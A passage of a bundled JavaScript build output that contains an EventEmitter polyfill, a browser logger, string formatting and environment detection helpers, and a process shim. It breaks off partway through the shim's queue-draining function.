$5440e9199a418654$var$EventEmitter.prototype.prependOnceListener = function prependOnceListener(type, listener) {
    $5440e9199a418654$var$checkListener(listener);
    this.prependListener(type, $5440e9199a418654$var$_onceWrap(this, type, listener));
    return this;
};
// Emits a 'removeListener' event if and only if the listener was removed.
$5440e9199a418654$var$EventEmitter.prototype.removeListener = function removeListener(type, listener) {
    var list, events, position, i, originalListener;
    $5440e9199a418654$var$checkListener(listener);
    events = this._events;
    if (events === undefined) return this;
    list = events[type];
    if (list === undefined) return this;
    if (list === listener || list.listener === listener) {
        if (--this._eventsCount === 0) this._events = Object.create(null);
        else {
            delete events[type];
            if (events.removeListener) this.emit("removeListener", type, list.listener || listener);
        }
    } else if (typeof list !== "function") {
        position = -1;
        for(i = list.length - 1; i >= 0; i--)if (list[i] === listener || list[i].listener === listener) {
            originalListener = list[i].listener;
            position = i;
            break;
        }
        if (position < 0) return this;
        if (position === 0) list.shift();
        else $5440e9199a418654$var$spliceOne(list, position);
        if (list.length === 1) events[type] = list[0];
        if (events.removeListener !== undefined) this.emit("removeListener", type, originalListener || listener);
    }
    return this;
};
$5440e9199a418654$var$EventEmitter.prototype.off = $5440e9199a418654$var$EventEmitter.prototype.removeListener;
$5440e9199a418654$var$EventEmitter.prototype.removeAllListeners = function removeAllListeners(type) {
    var listeners, events, i;
    events = this._events;
    if (events === undefined) return this;
    // not listening for removeListener, no need to emit
    if (events.removeListener === undefined) {
        if (arguments.length === 0) {
            this._events = Object.create(null);
            this._eventsCount = 0;
        } else if (events[type] !== undefined) {
            if (--this._eventsCount === 0) this._events = Object.create(null);
            else delete events[type];
        }
        return this;
    }
    // emit removeListener for all listeners on all events
    if (arguments.length === 0) {
        var keys = Object.keys(events);
        var key;
        for(i = 0; i < keys.length; ++i){
            key = keys[i];
            if (key === "removeListener") continue;
            this.removeAllListeners(key);
        }
        this.removeAllListeners("removeListener");
        this._events = Object.create(null);
        this._eventsCount = 0;
        return this;
    }
    listeners = events[type];
    if (typeof listeners === "function") this.removeListener(type, listeners);
    else if (listeners !== undefined) // LIFO order
    for(i = listeners.length - 1; i >= 0; i--)this.removeListener(type, listeners[i]);
    return this;
};
function $5440e9199a418654$var$_listeners(target, type, unwrap) {
    var events = target._events;
    if (events === undefined) return [];
    var evlistener = events[type];
    if (evlistener === undefined) return [];
    if (typeof evlistener === "function") return unwrap ? [
        evlistener.listener || evlistener
    ] : [
        evlistener
    ];
    return unwrap ? $5440e9199a418654$var$unwrapListeners(evlistener) : $5440e9199a418654$var$arrayClone(evlistener, evlistener.length);
}
$5440e9199a418654$var$EventEmitter.prototype.listeners = function listeners(type) {
    return $5440e9199a418654$var$_listeners(this, type, true);
};
$5440e9199a418654$var$EventEmitter.prototype.rawListeners = function rawListeners(type) {
    return $5440e9199a418654$var$_listeners(this, type, false);
};
$5440e9199a418654$var$EventEmitter.listenerCount = function(emitter, type) {
    if (typeof emitter.listenerCount === "function") return emitter.listenerCount(type);
    else return $5440e9199a418654$var$listenerCount.call(emitter, type);
};
$5440e9199a418654$var$EventEmitter.prototype.listenerCount = $5440e9199a418654$var$listenerCount;
function $5440e9199a418654$var$listenerCount(type) {
    var events = this._events;
    if (events !== undefined) {
        var evlistener = events[type];
        if (typeof evlistener === "function") return 1;
        else if (evlistener !== undefined) return evlistener.length;
    }
    return 0;
}
$5440e9199a418654$var$EventEmitter.prototype.eventNames = function eventNames() {
    return this._eventsCount > 0 ? $5440e9199a418654$var$ReflectOwnKeys(this._events) : [];
};
function $5440e9199a418654$var$arrayClone(arr, n) {
    var copy = new Array(n);
    for(var i = 0; i < n; ++i)copy[i] = arr[i];
    return copy;
}
function $5440e9199a418654$var$spliceOne(list, index) {
    for(; index + 1 < list.length; index++)list[index] = list[index + 1];
    list.pop();
}
function $5440e9199a418654$var$unwrapListeners(arr) {
    var ret = new Array(arr.length);
    for(var i = 0; i < ret.length; ++i)ret[i] = arr[i].listener || arr[i];
    return ret;
}
function $5440e9199a418654$var$once(emitter, name) {
    return new Promise(function(resolve, reject) {
        function errorListener(err) {
            emitter.removeListener(name, resolver);
            reject(err);
        }
        function resolver() {
            if (typeof emitter.removeListener === "function") emitter.removeListener("error", errorListener);
            resolve([].slice.call(arguments));
        }
        $5440e9199a418654$var$eventTargetAgnosticAddListener(emitter, name, resolver, {
            once: true
        });
        if (name !== "error") $5440e9199a418654$var$addErrorHandlerIfEventEmitter(emitter, errorListener, {
            once: true
        });
    });
}
function $5440e9199a418654$var$addErrorHandlerIfEventEmitter(emitter, handler, flags) {
    if (typeof emitter.on === "function") $5440e9199a418654$var$eventTargetAgnosticAddListener(emitter, "error", handler, flags);
}
function $5440e9199a418654$var$eventTargetAgnosticAddListener(emitter, name, listener, flags) {
    if (typeof emitter.on === "function") {
        if (flags.once) emitter.once(name, listener);
        else emitter.on(name, listener);
    } else if (typeof emitter.addEventListener === "function") // EventTarget does not have `error` event semantics like Node
    // EventEmitters, we do not listen for `error` events here.
    emitter.addEventListener(name, function wrapListener(arg) {
        // IE does not have builtin `{ once: true }` support so we
        // have to do it manually.
        if (flags.once) emitter.removeEventListener(name, wrapListener);
        listener(arg);
    });
    else throw new TypeError('The "emitter" argument must be of type EventEmitter. Received type ' + typeof emitter);
}

});

parcelRequire.register("aG48A", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});

var $7WQrb = parcelRequire("7WQrb");

$7WQrb.__exportStar((parcelRequire("9EePZ")), module.exports);

$7WQrb.__exportStar((parcelRequire("iD73S")), module.exports);

$7WQrb.__exportStar((parcelRequire("dTXLC")), module.exports);

$7WQrb.__exportStar((parcelRequire("2MWZl")), module.exports);

});

parcelRequire.register("5nu18", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});

var $7WQrb = parcelRequire("7WQrb");

$7WQrb.__exportStar((parcelRequire("bVfbs")), module.exports);

});
parcelRequire.register("bVfbs", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.IHeartBeat = void 0;
parcelRequire("37EVq");
var $3VSyk = parcelRequire("3VSyk");
class $8ae0cbc8ca291b66$var$IHeartBeat extends $3VSyk.IEvents {
    constructor(opts){
        super();
    }
}
module.exports.IHeartBeat = $8ae0cbc8ca291b66$var$IHeartBeat;

});
parcelRequire.register("37EVq", function(module, exports) {
$parcel$export(module.exports, "IEvents", () => (parcelRequire("3VSyk")).IEvents);
parcelRequire("3VSyk");

});
parcelRequire.register("3VSyk", function(module, exports) {

$parcel$export(module.exports, "IEvents", () => $2dd102fe42a3c147$export$ab429ec7e240e546);
class $2dd102fe42a3c147$export$ab429ec7e240e546 {
}

});




parcelRequire.register("1nGZv", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});

var $7WQrb = parcelRequire("7WQrb");

$7WQrb.__exportStar((parcelRequire("18uwn")), module.exports);

});
parcelRequire.register("18uwn", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.HEARTBEAT_EVENTS = module.exports.HEARTBEAT_INTERVAL = void 0;

var $aG48A = parcelRequire("aG48A");
module.exports.HEARTBEAT_INTERVAL = $aG48A.FIVE_SECONDS;
module.exports.HEARTBEAT_EVENTS = {
    pulse: "heartbeat_pulse"
};

});



parcelRequire.register("kgxrf", function(module, exports) {
"use strict";

var $7h4xj = parcelRequire("7h4xj");
module.exports = $03ceb28a240053b3$var$pino;
const $03ceb28a240053b3$var$_console = $03ceb28a240053b3$var$pfGlobalThisOrFallback().console || {};
const $03ceb28a240053b3$var$stdSerializers = {
    mapHttpRequest: $03ceb28a240053b3$var$mock,
    mapHttpResponse: $03ceb28a240053b3$var$mock,
    wrapRequestSerializer: $03ceb28a240053b3$var$passthrough,
    wrapResponseSerializer: $03ceb28a240053b3$var$passthrough,
    wrapErrorSerializer: $03ceb28a240053b3$var$passthrough,
    req: $03ceb28a240053b3$var$mock,
    res: $03ceb28a240053b3$var$mock,
    err: $03ceb28a240053b3$var$asErrValue
};
function $03ceb28a240053b3$var$shouldSerialize(serialize, serializers) {
    if (Array.isArray(serialize)) {
        const hasToFilter = serialize.filter(function(k) {
            return k !== "!stdSerializers.err";
        });
        return hasToFilter;
    } else if (serialize === true) return Object.keys(serializers);
    return false;
}
function $03ceb28a240053b3$var$pino(opts) {
    opts = opts || {};
    opts.browser = opts.browser || {};
    const transmit = opts.browser.transmit;
    if (transmit && typeof transmit.send !== "function") throw Error("pino: transmit option must have a send function");
    const proto = opts.browser.write || $03ceb28a240053b3$var$_console;
    if (opts.browser.write) opts.browser.asObject = true;
    const serializers = opts.serializers || {};
    const serialize = $03ceb28a240053b3$var$shouldSerialize(opts.browser.serialize, serializers);
    let stdErrSerialize = opts.browser.serialize;
    if (Array.isArray(opts.browser.serialize) && opts.browser.serialize.indexOf("!stdSerializers.err") > -1) stdErrSerialize = false;
    const levels = [
        "error",
        "fatal",
        "warn",
        "info",
        "debug",
        "trace"
    ];
    if (typeof proto === "function") proto.error = proto.fatal = proto.warn = proto.info = proto.debug = proto.trace = proto;
    if (opts.enabled === false) opts.level = "silent";
    const level = opts.level || "info";
    const logger = Object.create(proto);
    if (!logger.log) logger.log = $03ceb28a240053b3$var$noop;
    Object.defineProperty(logger, "levelVal", {
        get: getLevelVal
    });
    Object.defineProperty(logger, "level", {
        get: getLevel,
        set: setLevel
    });
    const setOpts = {
        transmit: transmit,
        serialize: serialize,
        asObject: opts.browser.asObject,
        levels: levels,
        timestamp: $03ceb28a240053b3$var$getTimeFunction(opts)
    };
    logger.levels = $03ceb28a240053b3$var$pino.levels;
    logger.level = level;
    logger.setMaxListeners = logger.getMaxListeners = logger.emit = logger.addListener = logger.on = logger.prependListener = logger.once = logger.prependOnceListener = logger.removeListener = logger.removeAllListeners = logger.listeners = logger.listenerCount = logger.eventNames = logger.write = logger.flush = $03ceb28a240053b3$var$noop;
    logger.serializers = serializers;
    logger._serialize = serialize;
    logger._stdErrSerialize = stdErrSerialize;
    logger.child = child;
    if (transmit) logger._logEvent = $03ceb28a240053b3$var$createLogEventShape();
    function getLevelVal() {
        return this.level === "silent" ? Infinity : this.levels.values[this.level];
    }
    function getLevel() {
        return this._level;
    }
    function setLevel(level) {
        if (level !== "silent" && !this.levels.values[level]) throw Error("unknown level " + level);
        this._level = level;
        $03ceb28a240053b3$var$set(setOpts, logger, "error", "log") // <-- must stay first
        ;
        $03ceb28a240053b3$var$set(setOpts, logger, "fatal", "error");
        $03ceb28a240053b3$var$set(setOpts, logger, "warn", "error");
        $03ceb28a240053b3$var$set(setOpts, logger, "info", "log");
        $03ceb28a240053b3$var$set(setOpts, logger, "debug", "log");
        $03ceb28a240053b3$var$set(setOpts, logger, "trace", "log");
    }
    function child(bindings, childOptions) {
        if (!bindings) throw new Error("missing bindings for child Pino");
        childOptions = childOptions || {};
        if (serialize && bindings.serializers) childOptions.serializers = bindings.serializers;
        const childOptionsSerializers = childOptions.serializers;
        if (serialize && childOptionsSerializers) {
            var childSerializers = Object.assign({}, serializers, childOptionsSerializers);
            var childSerialize = opts.browser.serialize === true ? Object.keys(childSerializers) : serialize;
            delete bindings.serializers;
            $03ceb28a240053b3$var$applySerializers([
                bindings
            ], childSerialize, childSerializers, this._stdErrSerialize);
        }
        function Child(parent) {
            this._childLevel = (parent._childLevel | 0) + 1;
            this.error = $03ceb28a240053b3$var$bind(parent, bindings, "error");
            this.fatal = $03ceb28a240053b3$var$bind(parent, bindings, "fatal");
            this.warn = $03ceb28a240053b3$var$bind(parent, bindings, "warn");
            this.info = $03ceb28a240053b3$var$bind(parent, bindings, "info");
            this.debug = $03ceb28a240053b3$var$bind(parent, bindings, "debug");
            this.trace = $03ceb28a240053b3$var$bind(parent, bindings, "trace");
            if (childSerializers) {
                this.serializers = childSerializers;
                this._serialize = childSerialize;
            }
            if (transmit) this._logEvent = $03ceb28a240053b3$var$createLogEventShape([].concat(parent._logEvent.bindings, bindings));
        }
        Child.prototype = this;
        return new Child(this);
    }
    return logger;
}
$03ceb28a240053b3$var$pino.levels = {
    values: {
        fatal: 60,
        error: 50,
        warn: 40,
        info: 30,
        debug: 20,
        trace: 10
    },
    labels: {
        10: "trace",
        20: "debug",
        30: "info",
        40: "warn",
        50: "error",
        60: "fatal"
    }
};
$03ceb28a240053b3$var$pino.stdSerializers = $03ceb28a240053b3$var$stdSerializers;
$03ceb28a240053b3$var$pino.stdTimeFunctions = Object.assign({}, {
    nullTime: $03ceb28a240053b3$var$nullTime,
    epochTime: $03ceb28a240053b3$var$epochTime,
    unixTime: $03ceb28a240053b3$var$unixTime,
    isoTime: $03ceb28a240053b3$var$isoTime
});
function $03ceb28a240053b3$var$set(opts, logger, level, fallback) {
    const proto = Object.getPrototypeOf(logger);
    logger[level] = logger.levelVal > logger.levels.values[level] ? $03ceb28a240053b3$var$noop : proto[level] ? proto[level] : $03ceb28a240053b3$var$_console[level] || $03ceb28a240053b3$var$_console[fallback] || $03ceb28a240053b3$var$noop;
    $03ceb28a240053b3$var$wrap(opts, logger, level);
}
function $03ceb28a240053b3$var$wrap(opts, logger, level) {
    if (!opts.transmit && logger[level] === $03ceb28a240053b3$var$noop) return;
    logger[level] = function(write) {
        return function LOG() {
            const ts = opts.timestamp();
            const args = new Array(arguments.length);
            const proto = Object.getPrototypeOf && Object.getPrototypeOf(this) === $03ceb28a240053b3$var$_console ? $03ceb28a240053b3$var$_console : this;
            for(var i = 0; i < args.length; i++)args[i] = arguments[i];
            if (opts.serialize && !opts.asObject) $03ceb28a240053b3$var$applySerializers(args, this._serialize, this.serializers, this._stdErrSerialize);
            if (opts.asObject) write.call(proto, $03ceb28a240053b3$var$asObject(this, level, args, ts));
            else write.apply(proto, args);
            if (opts.transmit) {
                const transmitLevel = opts.transmit.level || logger.level;
                const transmitValue = $03ceb28a240053b3$var$pino.levels.values[transmitLevel];
                const methodValue = $03ceb28a240053b3$var$pino.levels.values[level];
                if (methodValue < transmitValue) return;
                $03ceb28a240053b3$var$transmit(this, {
                    ts: ts,
                    methodLevel: level,
                    methodValue: methodValue,
                    transmitLevel: transmitLevel,
                    transmitValue: $03ceb28a240053b3$var$pino.levels.values[opts.transmit.level || logger.level],
                    send: opts.transmit.send,
                    val: logger.levelVal
                }, args);
            }
        };
    }(logger[level]);
}
function $03ceb28a240053b3$var$asObject(logger, level, args, ts) {
    if (logger._serialize) $03ceb28a240053b3$var$applySerializers(args, logger._serialize, logger.serializers, logger._stdErrSerialize);
    const argsCloned = args.slice();
    let msg = argsCloned[0];
    const o = {};
    if (ts) o.time = ts;
    o.level = $03ceb28a240053b3$var$pino.levels.values[level];
    let lvl = (logger._childLevel | 0) + 1;
    if (lvl < 1) lvl = 1;
    // deliberate, catching objects, arrays
    if (msg !== null && typeof msg === "object") {
        while(lvl-- && typeof argsCloned[0] === "object")Object.assign(o, argsCloned.shift());
        msg = argsCloned.length ? $7h4xj(argsCloned.shift(), argsCloned) : undefined;
    } else if (typeof msg === "string") msg = $7h4xj(argsCloned.shift(), argsCloned);
    if (msg !== undefined) o.msg = msg;
    return o;
}
function $03ceb28a240053b3$var$applySerializers(args, serialize, serializers, stdErrSerialize) {
    for(const i in args){
        if (stdErrSerialize && args[i] instanceof Error) args[i] = $03ceb28a240053b3$var$pino.stdSerializers.err(args[i]);
        else if (typeof args[i] === "object" && !Array.isArray(args[i])) {
            for(const k in args[i])if (serialize && serialize.indexOf(k) > -1 && k in serializers) args[i][k] = serializers[k](args[i][k]);
        }
    }
}
function $03ceb28a240053b3$var$bind(parent, bindings, level) {
    return function() {
        const args = new Array(1 + arguments.length);
        args[0] = bindings;
        for(var i = 1; i < args.length; i++)args[i] = arguments[i - 1];
        return parent[level].apply(this, args);
    };
}
function $03ceb28a240053b3$var$transmit(logger, opts, args) {
    const send = opts.send;
    const ts = opts.ts;
    const methodLevel = opts.methodLevel;
    const methodValue = opts.methodValue;
    const val = opts.val;
    const bindings = logger._logEvent.bindings;
    $03ceb28a240053b3$var$applySerializers(args, logger._serialize || Object.keys(logger.serializers), logger.serializers, logger._stdErrSerialize === undefined ? true : logger._stdErrSerialize);
    logger._logEvent.ts = ts;
    logger._logEvent.messages = args.filter(function(arg) {
        // bindings can only be objects, so reference equality check via indexOf is fine
        return bindings.indexOf(arg) === -1;
    });
    logger._logEvent.level.label = methodLevel;
    logger._logEvent.level.value = methodValue;
    send(methodLevel, logger._logEvent, val);
    logger._logEvent = $03ceb28a240053b3$var$createLogEventShape(bindings);
}
function $03ceb28a240053b3$var$createLogEventShape(bindings) {
    return {
        ts: 0,
        messages: [],
        bindings: bindings || [],
        level: {
            label: "",
            value: 0
        }
    };
}
function $03ceb28a240053b3$var$asErrValue(err) {
    const obj = {
        type: err.constructor.name,
        msg: err.message,
        stack: err.stack
    };
    for(const key in err)if (obj[key] === undefined) obj[key] = err[key];
    return obj;
}
function $03ceb28a240053b3$var$getTimeFunction(opts) {
    if (typeof opts.timestamp === "function") return opts.timestamp;
    if (opts.timestamp === false) return $03ceb28a240053b3$var$nullTime;
    return $03ceb28a240053b3$var$epochTime;
}
function $03ceb28a240053b3$var$mock() {
    return {};
}
function $03ceb28a240053b3$var$passthrough(a) {
    return a;
}
function $03ceb28a240053b3$var$noop() {}
function $03ceb28a240053b3$var$nullTime() {
    return false;
}
function $03ceb28a240053b3$var$epochTime() {
    return Date.now();
}
function $03ceb28a240053b3$var$unixTime() {
    return Math.round(Date.now() / 1000.0);
}
function $03ceb28a240053b3$var$isoTime() {
    return new Date(Date.now()).toISOString();
} // using Date.now() for testability
/* eslint-disable */ /* istanbul ignore next */ function $03ceb28a240053b3$var$pfGlobalThisOrFallback() {
    function defd(o) {
        return typeof o !== "undefined" && o;
    }
    try {
        if (typeof globalThis !== "undefined") return globalThis;
        Object.defineProperty(Object.prototype, "globalThis", {
            get: function() {
                delete Object.prototype.globalThis;
                return this.globalThis = this;
            },
            configurable: true
        });
        return globalThis;
    } catch (e) {
        return defd(self) || defd(window) || defd(this) || {};
    }
} /* eslint-enable */ 

});
parcelRequire.register("7h4xj", function(module, exports) {
"use strict";
function $54bda3badc858a5e$var$tryStringify(o) {
    try {
        return JSON.stringify(o);
    } catch (e) {
        return '"[Circular]"';
    }
}
module.exports = $54bda3badc858a5e$var$format;
function $54bda3badc858a5e$var$format(f, args, opts) {
    var ss = opts && opts.stringify || $54bda3badc858a5e$var$tryStringify;
    var offset = 1;
    if (typeof f === "object" && f !== null) {
        var len = args.length + offset;
        if (len === 1) return f;
        var objects = new Array(len);
        objects[0] = ss(f);
        for(var index = 1; index < len; index++)objects[index] = ss(args[index]);
        return objects.join(" ");
    }
    if (typeof f !== "string") return f;
    var argLen = args.length;
    if (argLen === 0) return f;
    var str = "";
    var a = 1 - offset;
    var lastPos = -1;
    var flen = f && f.length || 0;
    for(var i = 0; i < flen;){
        if (f.charCodeAt(i) === 37 && i + 1 < flen) {
            lastPos = lastPos > -1 ? lastPos : 0;
            switch(f.charCodeAt(i + 1)){
                case 100:
                case 102:
                    if (a >= argLen) break;
                    if (args[a] == null) break;
                    if (lastPos < i) str += f.slice(lastPos, i);
                    str += Number(args[a]);
                    lastPos = i + 2;
                    i++;
                    break;
                case 105:
                    if (a >= argLen) break;
                    if (args[a] == null) break;
                    if (lastPos < i) str += f.slice(lastPos, i);
                    str += Math.floor(Number(args[a]));
                    lastPos = i + 2;
                    i++;
                    break;
                case 79:
                case 111:
                case 106:
                    if (a >= argLen) break;
                    if (args[a] === undefined) break;
                    if (lastPos < i) str += f.slice(lastPos, i);
                    var type = typeof args[a];
                    if (type === "string") {
                        str += "'" + args[a] + "'";
                        lastPos = i + 2;
                        i++;
                        break;
                    }
                    if (type === "function") {
                        str += args[a].name || "<anonymous>";
                        lastPos = i + 2;
                        i++;
                        break;
                    }
                    str += ss(args[a]);
                    lastPos = i + 2;
                    i++;
                    break;
                case 115:
                    if (a >= argLen) break;
                    if (lastPos < i) str += f.slice(lastPos, i);
                    str += String(args[a]);
                    lastPos = i + 2;
                    i++;
                    break;
                case 37:
                    if (lastPos < i) str += f.slice(lastPos, i);
                    str += "%";
                    lastPos = i + 2;
                    i++;
                    a--;
                    break;
            }
            ++a;
        }
        ++i;
    }
    if (lastPos === -1) return f;
    else if (lastPos < flen) str += f.slice(lastPos);
    return str;
}

});


parcelRequire.register("glyO2", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.PINO_CUSTOM_CONTEXT_KEY = module.exports.PINO_LOGGER_DEFAULTS = void 0;
module.exports.PINO_LOGGER_DEFAULTS = {
    level: "info"
};
module.exports.PINO_CUSTOM_CONTEXT_KEY = "custom_context";

});

parcelRequire.register("cyyD4", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.generateChildLogger = module.exports.formatChildLoggerContext = module.exports.getLoggerContext = module.exports.setBrowserLoggerContext = module.exports.getBrowserLoggerContext = module.exports.getDefaultLoggerOptions = void 0;

var $glyO2 = parcelRequire("glyO2");
function $924385a22f0d1fa4$var$getDefaultLoggerOptions(opts) {
    return Object.assign(Object.assign({}, opts), {
        level: (opts === null || opts === void 0 ? void 0 : opts.level) || $glyO2.PINO_LOGGER_DEFAULTS.level
    });
}
module.exports.getDefaultLoggerOptions = $924385a22f0d1fa4$var$getDefaultLoggerOptions;
function $924385a22f0d1fa4$var$getBrowserLoggerContext(logger, customContextKey = $glyO2.PINO_CUSTOM_CONTEXT_KEY) {
    return logger[customContextKey] || "";
}
module.exports.getBrowserLoggerContext = $924385a22f0d1fa4$var$getBrowserLoggerContext;
function $924385a22f0d1fa4$var$setBrowserLoggerContext(logger, context, customContextKey = $glyO2.PINO_CUSTOM_CONTEXT_KEY) {
    logger[customContextKey] = context;
    return logger;
}
module.exports.setBrowserLoggerContext = $924385a22f0d1fa4$var$setBrowserLoggerContext;
function $924385a22f0d1fa4$var$getLoggerContext(logger, customContextKey = $glyO2.PINO_CUSTOM_CONTEXT_KEY) {
    let context = "";
    if (typeof logger.bindings === "undefined") context = $924385a22f0d1fa4$var$getBrowserLoggerContext(logger, customContextKey);
    else context = logger.bindings().context || "";
    return context;
}
module.exports.getLoggerContext = $924385a22f0d1fa4$var$getLoggerContext;
function $924385a22f0d1fa4$var$formatChildLoggerContext(logger, childContext, customContextKey = $glyO2.PINO_CUSTOM_CONTEXT_KEY) {
    const parentContext = $924385a22f0d1fa4$var$getLoggerContext(logger, customContextKey);
    const context = parentContext.trim() ? `${parentContext}/${childContext}` : childContext;
    return context;
}
module.exports.formatChildLoggerContext = $924385a22f0d1fa4$var$formatChildLoggerContext;
function $924385a22f0d1fa4$var$generateChildLogger(logger, childContext, customContextKey = $glyO2.PINO_CUSTOM_CONTEXT_KEY) {
    const context = $924385a22f0d1fa4$var$formatChildLoggerContext(logger, childContext, customContextKey);
    const child = logger.child({
        context: context
    });
    return $924385a22f0d1fa4$var$setBrowserLoggerContext(child, context, customContextKey);
}
module.exports.generateChildLogger = $924385a22f0d1fa4$var$generateChildLogger;

});

parcelRequire.register("ljFVp", function(module, exports) {
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.isBrowserCryptoAvailable = module.exports.getSubtleCrypto = module.exports.getBrowerCrypto = void 0;
function $f84be4b966947ef2$var$getBrowerCrypto() {
    return ($parcel$global === null || $parcel$global === void 0 ? void 0 : $parcel$global.crypto) || ($parcel$global === null || $parcel$global === void 0 ? void 0 : $parcel$global.msCrypto) || {};
}
module.exports.getBrowerCrypto = $f84be4b966947ef2$var$getBrowerCrypto;
function $f84be4b966947ef2$var$getSubtleCrypto() {
    const browserCrypto = $f84be4b966947ef2$var$getBrowerCrypto();
    return browserCrypto.subtle || browserCrypto.webkitSubtle;
}
module.exports.getSubtleCrypto = $f84be4b966947ef2$var$getSubtleCrypto;
function $f84be4b966947ef2$var$isBrowserCryptoAvailable() {
    return !!$f84be4b966947ef2$var$getBrowerCrypto() && !!$f84be4b966947ef2$var$getSubtleCrypto();
}
module.exports.isBrowserCryptoAvailable = $f84be4b966947ef2$var$isBrowserCryptoAvailable;

});

parcelRequire.register("5vmD7", function(module, exports) {

var $hPtJY = parcelRequire("hPtJY");
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.isBrowser = module.exports.isNode = module.exports.isReactNative = void 0;
function $402166cfd1e26574$var$isReactNative() {
    return typeof document === "undefined" && typeof navigator !== "undefined" && navigator.product === "ReactNative";
}
module.exports.isReactNative = $402166cfd1e26574$var$isReactNative;
function $402166cfd1e26574$var$isNode() {
    return typeof $hPtJY !== "undefined" && typeof $hPtJY.versions !== "undefined" && typeof $hPtJY.versions.node !== "undefined";
}
module.exports.isNode = $402166cfd1e26574$var$isNode;
function $402166cfd1e26574$var$isBrowser() {
    return !$402166cfd1e26574$var$isReactNative() && !$402166cfd1e26574$var$isNode();
}
module.exports.isBrowser = $402166cfd1e26574$var$isBrowser;

});
parcelRequire.register("hPtJY", function(module, exports) {
// shim for using process in browser
var $cfae44f0dfdf62c0$var$process = module.exports = {};
// cached from whatever global is present so that test runners that stub it
// don't break things.  But we need to wrap it in a try catch in case it is
// wrapped in strict mode code which doesn't define any globals.  It's inside a
// function because try/catches deoptimize in certain engines.
var $cfae44f0dfdf62c0$var$cachedSetTimeout;
var $cfae44f0dfdf62c0$var$cachedClearTimeout;
function $cfae44f0dfdf62c0$var$defaultSetTimout() {
    throw new Error("setTimeout has not been defined");
}
function $cfae44f0dfdf62c0$var$defaultClearTimeout() {
    throw new Error("clearTimeout has not been defined");
}
(function() {
    try {
        if (typeof setTimeout === "function") $cfae44f0dfdf62c0$var$cachedSetTimeout = setTimeout;
        else $cfae44f0dfdf62c0$var$cachedSetTimeout = $cfae44f0dfdf62c0$var$defaultSetTimout;
    } catch (e) {
        $cfae44f0dfdf62c0$var$cachedSetTimeout = $cfae44f0dfdf62c0$var$defaultSetTimout;
    }
    try {
        if (typeof clearTimeout === "function") $cfae44f0dfdf62c0$var$cachedClearTimeout = clearTimeout;
        else $cfae44f0dfdf62c0$var$cachedClearTimeout = $cfae44f0dfdf62c0$var$defaultClearTimeout;
    } catch (e) {
        $cfae44f0dfdf62c0$var$cachedClearTimeout = $cfae44f0dfdf62c0$var$defaultClearTimeout;
    }
})();
function $cfae44f0dfdf62c0$var$runTimeout(fun) {
    if ($cfae44f0dfdf62c0$var$cachedSetTimeout === setTimeout) //normal enviroments in sane situations
    return setTimeout(fun, 0);
    // if setTimeout wasn't available but was latter defined
    if (($cfae44f0dfdf62c0$var$cachedSetTimeout === $cfae44f0dfdf62c0$var$defaultSetTimout || !$cfae44f0dfdf62c0$var$cachedSetTimeout) && setTimeout) {
        $cfae44f0dfdf62c0$var$cachedSetTimeout = setTimeout;
        return setTimeout(fun, 0);
    }
    try {
        // when when somebody has screwed with setTimeout but no I.E. maddness
        return $cfae44f0dfdf62c0$var$cachedSetTimeout(fun, 0);
    } catch (e) {
        try {
            // When we are in I.E. but the script has been evaled so I.E. doesn't trust the global object when called normally
            return $cfae44f0dfdf62c0$var$cachedSetTimeout.call(null, fun, 0);
        } catch (e) {
            // same as above but when it's a version of I.E. that must have the global object for 'this', hopfully our context correct otherwise it will throw a global error
            return $cfae44f0dfdf62c0$var$cachedSetTimeout.call(this, fun, 0);
        }
    }
}
function $cfae44f0dfdf62c0$var$runClearTimeout(marker) {
    if ($cfae44f0dfdf62c0$var$cachedClearTimeout === clearTimeout) //normal enviroments in sane situations
    return clearTimeout(marker);
    // if clearTimeout wasn't available but was latter defined
    if (($cfae44f0dfdf62c0$var$cachedClearTimeout === $cfae44f0dfdf62c0$var$defaultClearTimeout || !$cfae44f0dfdf62c0$var$cachedClearTimeout) && clearTimeout) {
        $cfae44f0dfdf62c0$var$cachedClearTimeout = clearTimeout;
        return clearTimeout(marker);
    }
    try {
        // when when somebody has screwed with setTimeout but no I.E. maddness
        return $cfae44f0dfdf62c0$var$cachedClearTimeout(marker);
    } catch (e) {
        try {
            // When we are in I.E. but the script has been evaled so I.E. doesn't  trust the global object when called normally
            return $cfae44f0dfdf62c0$var$cachedClearTimeout.call(null, marker);
        } catch (e) {
            // same as above but when it's a version of I.E. that must have the global object for 'this', hopfully our context correct otherwise it will throw a global error.
            // Some versions of I.E. have different rules for clearTimeout vs setTimeout
            return $cfae44f0dfdf62c0$var$cachedClearTimeout.call(this, marker);
        }
    }
}
var $cfae44f0dfdf62c0$var$queue = [];
var $cfae44f0dfdf62c0$var$draining = false;
var $cfae44f0dfdf62c0$var$currentQueue;
var $cfae44f0dfdf62c0$var$queueIndex = -1;
function $cfae44f0dfdf62c0$var$cleanUpNextTick() {
    if (!$cfae44f0dfdf62c0$var$draining || !$cfae44f0dfdf62c0$var$currentQueue) return;
    $cfae44f0dfdf62c0$var$draining = false;
    if ($cfae44f0dfdf62c0$var$currentQueue.length) $cfae44f0dfdf62c0$var$queue = $cfae44f0dfdf62c0$var$currentQueue.concat($cfae44f0dfdf62c0$var$queue);
    else $cfae44f0dfdf62c0$var$queueIndex = -1;
    if ($cfae44f0dfdf62c0$var$queue.length) $cfae44f0dfdf62c0$var$drainQueue();
}
function $cfae44f0dfdf62c0$var$drainQueue() {
    if ($cfae44f0dfdf62c0$var$draining) return;
    var timeout = $cfae44f0dfdf62c0$var$runTimeout($cfae44f0dfdf62c0$var$cleanUpNextTick);
    $cfae44f0dfdf62c0$var$draining = true;
    var len = $cfae44f0dfdf62c0$var$queue.length;
    while(len){
        $cfae44f0dfdf62c0$var$currentQueue = $cfae44f0dfdf62c0$var$queue;
        $cfae44f0dfdf62c0$var$queue = [];
